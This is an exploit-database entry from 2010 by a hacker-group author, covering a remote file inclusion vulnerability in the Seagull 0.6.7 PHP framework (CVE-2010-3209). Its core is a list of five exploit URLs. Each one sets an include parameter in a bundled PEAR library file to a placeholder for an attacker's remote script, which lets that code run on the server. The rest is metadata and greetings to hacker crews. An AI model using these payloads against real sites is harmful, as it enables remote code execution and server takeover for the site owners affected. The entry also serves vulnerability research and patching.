seagull 0.6.7 - Remote File Inclusion
Author: FoX HaCkEr
type: webapps
platform: php
port:
date_added: 2010-08-30
date_updated: 2010-08-30
verified: 0
codes: CVE-2010-3209;OSVDB-67807;OSVDB-67806;OSVDB-67805;OSVDB-67804
tags:
aliases:
screenshot_url:
application_url:
=================================
seagull-0.6.7 <===remote file inclode
=================================
# Exploit Title : seagull-0.6.7 <===remote file inclode
# Date: 2010-08-29
# Author : FoX HaCkEr
#Contact : MKQ@HoTmAiL.CoM
# SiTe : www.sec4ever.com
# Download: http://seagullproject.org/
# Version:6.7
# Google dork: [sorry]
======================================================================================================
exploit :
http://localhost/fog/lib/pear/Config/Container.php?includeFile=[EV!L]
http://localhost/fog/lib/pear/DB/NestedSet.php?driverpath=[EV!L]
http://localhost/fog/lib/pear/HTML/QuickForm.php?includeFile=[EV!L]
http://localhost/fog/lib/pear/DB/NestedSet/Output.php?path=[EV!L]
http://localhost/fog/lib/pear/HTML/QuickForm.php?includeFile=[EV!L]
=======================================================================================================
Gr33ts: Mr.MoDaMeR & SILVER FoX & Z7FAN HaCkEr & Black Cobra & KinG oF CnTroL & MadjiX & Ma3sTr0-Dz
Lagripe-Dz & Shi6oN HaCkEr & ALL Members sec4ever & ALL MY Friend in MsN & ALL Members Sa-HaCkE